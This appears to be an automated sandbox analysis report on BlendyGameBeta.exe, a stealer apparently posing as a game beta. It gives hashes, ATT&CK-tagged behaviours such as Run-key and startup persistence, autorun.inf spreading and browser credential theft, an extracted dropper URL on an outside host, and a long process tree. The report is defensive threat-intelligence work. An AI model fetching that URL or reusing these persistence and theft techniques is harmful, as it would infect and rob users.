7bb922f34437a2358f5eaa01d7f6c04dc2194e22e3e84f62ac8e5066defd2c38

Analysis

max time kernel
65s
max time network
164s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
13/02/2024, 02:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

BlendyGameBeta.exe
Size

164.6MB
MD5

4172c5248c4743a9c0196f489b3bc2ae
SHA1

a2324a017f5cc49cc1df594306f0e6afdb7572a4
SHA256

a6571580c4c0248112c4cf4def6a2f7d7b12eea6fa47d503c8bd4575d2eadebe
SHA512

c093fd7f04ea19bc6e8840449abe42780a410acfae591adbf6139e013e5a51758e3d0d881575684099d6e7176913bf097619dedcfb0af374c18c5b0c59c1b92d
SSDEEP

1572864:dTHz0kMCujI1eyC++kaq+PJ++4Z9sDlOfZo4ZpiXMeoSiSx8r6fF7B3kULdr0fcD:JBgyC+h4JK3WP/+

Score

10^/10

persistence spyware stealer

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://hawkish.fr/grabber/nova/GXCEKRQkHtjanbTJfswGvwkKWJCcWexPCRuTulGOxoFWgiddXoIlwWHcYbli

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Control Panel\International\Geo\Nation	BlendyGameBeta.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BlendyGameBeta.exe	BlendyGameBeta.exe

Loads dropped DLL 2 IoCs

pid	Process
4620	BlendyGameBeta.exe
4620	BlendyGameBeta.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDriverSetupfUc7wH = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\BlendyGameBeta.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Start_fUc7wH = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\sysWin10Boot_fUc7wH.vbs"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
70	raw.githubusercontent.com
76	raw.githubusercontent.com
77	raw.githubusercontent.com
81	raw.githubusercontent.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
49	ipinfo.io
50	ipinfo.io

Drops autorun.inf file 1 TTPs 1 IoCs

Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media

T1091

description	ioc	Process
File created	F:\autorun.inf	BlendyGameBeta.exe

Checks processor information in registry 2 TTPs 7 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	BlendyGameBeta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz	BlendyGameBeta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString	BlendyGameBeta.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2	BlendyGameBeta.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	BlendyGameBeta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	BlendyGameBeta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	BlendyGameBeta.exe

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
7388	schtasks.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
10912	WMIC.exe

Enumerates processes with tasklist 1 TTPs 64 IoCs

Process Discovery

T1057

pid	Process
1604	tasklist.exe
7408	tasklist.exe
7576	tasklist.exe
7624	tasklist.exe
7360	tasklist.exe
7216	tasklist.exe
5888	tasklist.exe
7232	tasklist.exe
8064	tasklist.exe
7592	tasklist.exe
7392	tasklist.exe
7156	tasklist.exe
4232	tasklist.exe
7868	tasklist.exe
7672	tasklist.exe
7656	tasklist.exe
7416	tasklist.exe
7376	tasklist.exe
7332	tasklist.exe
7804	tasklist.exe
7600	tasklist.exe
7432	tasklist.exe
6996	tasklist.exe
7132	tasklist.exe
7292	tasklist.exe
7476	tasklist.exe
7528	tasklist.exe
7860	tasklist.exe
7400	tasklist.exe
7348	tasklist.exe
7224	tasklist.exe
7204	tasklist.exe
7284	tasklist.exe
8132	tasklist.exe
8056	tasklist.exe
8048	tasklist.exe
8024	tasklist.exe
7616	tasklist.exe
7440	tasklist.exe
7164	tasklist.exe
7984	tasklist.exe
7468	tasklist.exe
7368	tasklist.exe
7324	tasklist.exe
7180	tasklist.exe
7172	tasklist.exe
7772	tasklist.exe
8152	tasklist.exe
7852	tasklist.exe
7664	tasklist.exe
7456	tasklist.exe
7424	tasklist.exe
7316	tasklist.exe
7252	tasklist.exe
7188	tasklist.exe
7148	tasklist.exe
7140	tasklist.exe
7684	tasklist.exe
8096	tasklist.exe
8016	tasklist.exe
7876	tasklist.exe
7784	tasklist.exe
7696	tasklist.exe
7608	tasklist.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 38 IoCs

pid	Process
4620	BlendyGameBeta.exe
4620	BlendyGameBeta.exe
4620	BlendyGameBeta.exe
4620	BlendyGameBeta.exe
9408	powershell.exe
9408	powershell.exe
9408	powershell.exe
9052	Conhost.exe
9052	Conhost.exe
9052	Conhost.exe
7852	powershell.exe
7852	powershell.exe
1584	powershell.exe
1584	powershell.exe
9596	powershell.exe
9596	powershell.exe
5472	powershell.exe
5472	powershell.exe
9596	powershell.exe
5472	powershell.exe
7852	powershell.exe
1584	powershell.exe
6148	powershell.exe
6148	powershell.exe
3560	powershell.exe
3560	powershell.exe
6148	powershell.exe
3560	powershell.exe
10800	powershell.exe
10800	powershell.exe
10800	powershell.exe
7496	powershell.exe
7496	powershell.exe
7496	powershell.exe
5568	powershell.exe
5568	powershell.exe
6964	powershell.exe
6964	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1604	tasklist.exe
Token: SeIncreaseQuotaPrivilege	3580	WMIC.exe
Token: SeSecurityPrivilege	3580	WMIC.exe
Token: SeTakeOwnershipPrivilege	3580	WMIC.exe
Token: SeLoadDriverPrivilege	3580	WMIC.exe
Token: SeSystemProfilePrivilege	3580	WMIC.exe
Token: SeSystemtimePrivilege	3580	WMIC.exe
Token: SeProfSingleProcessPrivilege	3580	WMIC.exe
Token: SeIncBasePriorityPrivilege	3580	WMIC.exe
Token: SeCreatePagefilePrivilege	3580	WMIC.exe
Token: SeBackupPrivilege	3580	WMIC.exe
Token: SeRestorePrivilege	3580	WMIC.exe
Token: SeShutdownPrivilege	3580	WMIC.exe
Token: SeDebugPrivilege	3580	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3580	WMIC.exe
Token: SeRemoteShutdownPrivilege	3580	WMIC.exe
Token: SeUndockPrivilege	3580	WMIC.exe
Token: SeManageVolumePrivilege	3580	WMIC.exe
Token: 33	3580	WMIC.exe
Token: 34	3580	WMIC.exe
Token: 35	3580	WMIC.exe
Token: 36	3580	WMIC.exe
Token: SeShutdownPrivilege	4620	BlendyGameBeta.exe
Token: SeCreatePagefilePrivilege	4620	BlendyGameBeta.exe
Token: SeIncreaseQuotaPrivilege	3580	WMIC.exe
Token: SeSecurityPrivilege	3580	WMIC.exe
Token: SeTakeOwnershipPrivilege	3580	WMIC.exe
Token: SeLoadDriverPrivilege	3580	WMIC.exe
Token: SeSystemProfilePrivilege	3580	WMIC.exe
Token: SeSystemtimePrivilege	3580	WMIC.exe
Token: SeProfSingleProcessPrivilege	3580	WMIC.exe
Token: SeIncBasePriorityPrivilege	3580	WMIC.exe
Token: SeCreatePagefilePrivilege	3580	WMIC.exe
Token: SeBackupPrivilege	3580	WMIC.exe
Token: SeRestorePrivilege	3580	WMIC.exe
Token: SeShutdownPrivilege	3580	WMIC.exe
Token: SeDebugPrivilege	3580	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3580	WMIC.exe
Token: SeRemoteShutdownPrivilege	3580	WMIC.exe
Token: SeUndockPrivilege	3580	WMIC.exe
Token: SeManageVolumePrivilege	3580	WMIC.exe
Token: 33	3580	WMIC.exe
Token: 34	3580	WMIC.exe
Token: 35	3580	WMIC.exe
Token: 36	3580	WMIC.exe
Token: SeShutdownPrivilege	4620	BlendyGameBeta.exe
Token: SeCreatePagefilePrivilege	4620	BlendyGameBeta.exe
Token: SeShutdownPrivilege	4620	BlendyGameBeta.exe
Token: SeCreatePagefilePrivilege	4620	BlendyGameBeta.exe
Token: SeDebugPrivilege	7156	tasklist.exe
Token: SeDebugPrivilege	7148	tasklist.exe
Token: SeDebugPrivilege	7140	tasklist.exe
Token: SeDebugPrivilege	6996	tasklist.exe
Token: SeDebugPrivilege	7172	tasklist.exe
Token: SeIncreaseQuotaPrivilege	7520	WMIC.exe
Token: SeSecurityPrivilege	7520	WMIC.exe
Token: SeTakeOwnershipPrivilege	7520	WMIC.exe
Token: SeLoadDriverPrivilege	7520	WMIC.exe
Token: SeSystemProfilePrivilege	7520	WMIC.exe
Token: SeSystemtimePrivilege	7520	WMIC.exe
Token: SeProfSingleProcessPrivilege	7520	WMIC.exe
Token: SeIncBasePriorityPrivilege	7520	WMIC.exe
Token: SeCreatePagefilePrivilege	7520	WMIC.exe
Token: SeBackupPrivilege	7520	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4620 wrote to memory of 4228	4620	BlendyGameBeta.exe	82
PID 4620 wrote to memory of 4228	4620	BlendyGameBeta.exe	82
PID 4228 wrote to memory of 1604	4228	cmd.exe	84
PID 4228 wrote to memory of 1604	4228	cmd.exe	84
PID 4620 wrote to memory of 3432	4620	BlendyGameBeta.exe	85
PID 4620 wrote to memory of 3432	4620	BlendyGameBeta.exe	85
PID 4620 wrote to memory of 3432	4620	BlendyGameBeta.exe	85
PID 4620 wrote to memory of 3432	4620	BlendyGameBeta.exe	85
PID 4620 wrote to memory of 3432	4620	BlendyGameBeta.exe	85
PID 4620 wrote to memory of 3432	4620	BlendyGameBeta.exe	85
PID 4620 wrote to memory of 3432	4620	BlendyGameBeta.exe	85
PID 4620 wrote to memory of 3432	4620	BlendyGameBeta.exe	85
PID 4620 wrote to memory of 3432	4620	BlendyGameBeta.exe	85
PID 4620 wrote to memory of 3432	4620	BlendyGameBeta.exe	85
PID 4620 wrote to memory of 3432	4620	BlendyGameBeta.exe	85
PID 4620 wrote to memory of 3432	4620	BlendyGameBeta.exe	85
PID 4620 wrote to memory of 3432	4620	BlendyGameBeta.exe	85
PID 4620 wrote to memory of 3432	4620	BlendyGameBeta.exe	85
PID 4620 wrote to memory of 3432	4620	BlendyGameBeta.exe	85
PID 4620 wrote to memory of 3432	4620	BlendyGameBeta.exe	85
PID 4620 wrote to memory of 3432	4620	BlendyGameBeta.exe	85
PID 4620 wrote to memory of 3432	4620	BlendyGameBeta.exe	85
PID 4620 wrote to memory of 3432	4620	BlendyGameBeta.exe	85
PID 4620 wrote to memory of 3432	4620	BlendyGameBeta.exe	85
PID 4620 wrote to memory of 3432	4620	BlendyGameBeta.exe	85
PID 4620 wrote to memory of 3432	4620	BlendyGameBeta.exe	85
PID 4620 wrote to memory of 3432	4620	BlendyGameBeta.exe	85
PID 4620 wrote to memory of 3432	4620	BlendyGameBeta.exe	85
PID 4620 wrote to memory of 3432	4620	BlendyGameBeta.exe	85
PID 4620 wrote to memory of 3432	4620	BlendyGameBeta.exe	85
PID 4620 wrote to memory of 3432	4620	BlendyGameBeta.exe	85
PID 4620 wrote to memory of 3432	4620	BlendyGameBeta.exe	85
PID 4620 wrote to memory of 3432	4620	BlendyGameBeta.exe	85
PID 4620 wrote to memory of 3432	4620	BlendyGameBeta.exe	85
PID 4620 wrote to memory of 2440	4620	BlendyGameBeta.exe	86
PID 4620 wrote to memory of 2440	4620	BlendyGameBeta.exe	86
PID 4620 wrote to memory of 404	4620	BlendyGameBeta.exe	88
PID 4620 wrote to memory of 404	4620	BlendyGameBeta.exe	88
PID 404 wrote to memory of 3580	404	cmd.exe	91
PID 404 wrote to memory of 3580	404	cmd.exe	91
PID 4620 wrote to memory of 2436	4620	BlendyGameBeta.exe	114
PID 4620 wrote to memory of 2436	4620	BlendyGameBeta.exe	114
PID 4620 wrote to memory of 3176	4620	BlendyGameBeta.exe	113
PID 4620 wrote to memory of 3176	4620	BlendyGameBeta.exe	113
PID 4620 wrote to memory of 892	4620	BlendyGameBeta.exe	112
PID 4620 wrote to memory of 892	4620	BlendyGameBeta.exe	112
PID 4620 wrote to memory of 1252	4620	BlendyGameBeta.exe	111
PID 4620 wrote to memory of 1252	4620	BlendyGameBeta.exe	111
PID 4620 wrote to memory of 3884	4620	BlendyGameBeta.exe	110
PID 4620 wrote to memory of 3884	4620	BlendyGameBeta.exe	110
PID 4620 wrote to memory of 416	4620	BlendyGameBeta.exe	109
PID 4620 wrote to memory of 416	4620	BlendyGameBeta.exe	109
PID 4620 wrote to memory of 4628	4620	BlendyGameBeta.exe	107
PID 4620 wrote to memory of 4628	4620	BlendyGameBeta.exe	107
PID 4620 wrote to memory of 3668	4620	BlendyGameBeta.exe	106
PID 4620 wrote to memory of 3668	4620	BlendyGameBeta.exe	106
PID 4620 wrote to memory of 4916	4620	BlendyGameBeta.exe	104
PID 4620 wrote to memory of 4916	4620	BlendyGameBeta.exe	104
PID 4620 wrote to memory of 1716	4620	BlendyGameBeta.exe	103
PID 4620 wrote to memory of 1716	4620	BlendyGameBeta.exe	103
PID 4620 wrote to memory of 220	4620	BlendyGameBeta.exe	102
PID 4620 wrote to memory of 220	4620	BlendyGameBeta.exe	102
PID 4620 wrote to memory of 3752	4620	BlendyGameBeta.exe	100
PID 4620 wrote to memory of 3752	4620	BlendyGameBeta.exe	100

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
5736	attrib.exe
8388	attrib.exe

C:\Users\Admin\AppData\Local\Temp\BlendyGameBeta.exe
"C:\Users\Admin\AppData\Local\Temp\BlendyGameBeta.exe"
1⤵
- Checks computer location settings
- Drops startup file
- Loads dropped DLL
- Drops autorun.inf file
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4620
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4228
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:1604
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:7632
- C:\Users\Admin\AppData\Local\Temp\BlendyGameBeta.exe
  "C:\Users\Admin\AppData\Local\Temp\BlendyGameBeta.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1692 --field-trial-handle=1696,i,12433070087031923515,15424105341247853601,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
  2⤵
  PID:3432
- C:\Users\Admin\AppData\Local\Temp\BlendyGameBeta.exe
  "C:\Users\Admin\AppData\Local\Temp\BlendyGameBeta.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --mojo-platform-channel-handle=1728 --field-trial-handle=1696,i,12433070087031923515,15424105341247853601,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
  2⤵
  PID:2440
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=4620 get ExecutablePath"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:404
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic process where processid=4620 get ExecutablePath
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3580
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4488
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:7384
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:1156
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:7276
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:2540
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7188
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:2884
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7360
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4868
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7348
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3752
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7468
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3876
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:6996
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:220
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7368
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:1716
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:7340
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4916
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7324
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3668
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7224
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4628
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7392
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:416
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7476
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3884
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:7172
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:1252
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7204
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:892
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:7196
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3176
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7180
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:2436
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7132
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4348
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:7300
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Temp\resources\app.asar.unpacked\bind\main.exe"
  2⤵
  PID:5168
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"
  2⤵
  PID:5208
- - C:\Windows\system32\more.com
    more +1
    3⤵
    PID:7584
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic OS get caption, osarchitecture
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:7520
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
  2⤵
  PID:5192
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic csproduct get uuid
    3⤵
    PID:7968
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "net session"
  2⤵
  PID:5148
- - C:\Windows\system32\net.exe
    net session
    3⤵
    PID:7976
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 session
      4⤵
      PID:9012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3012
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:2660
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3228
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3324
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:1212
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:2296
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:2100
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:1948
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:1604
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:736
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4024
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:2832
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:1812
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4480
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:1640
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3108
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:2268
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:1296
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:2372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4456
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:1276
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:1636
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4924
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3764
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:2292
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:800
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:636
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:2212
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:1840
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:1104
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:688
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:1900
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:992
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:1196
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:1912
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3380
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3376
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:1048
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4336
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:2252
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:8
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4484
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:1068
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:772
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:2256
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4328
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:2164
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4968
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4304
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:768
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4332
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
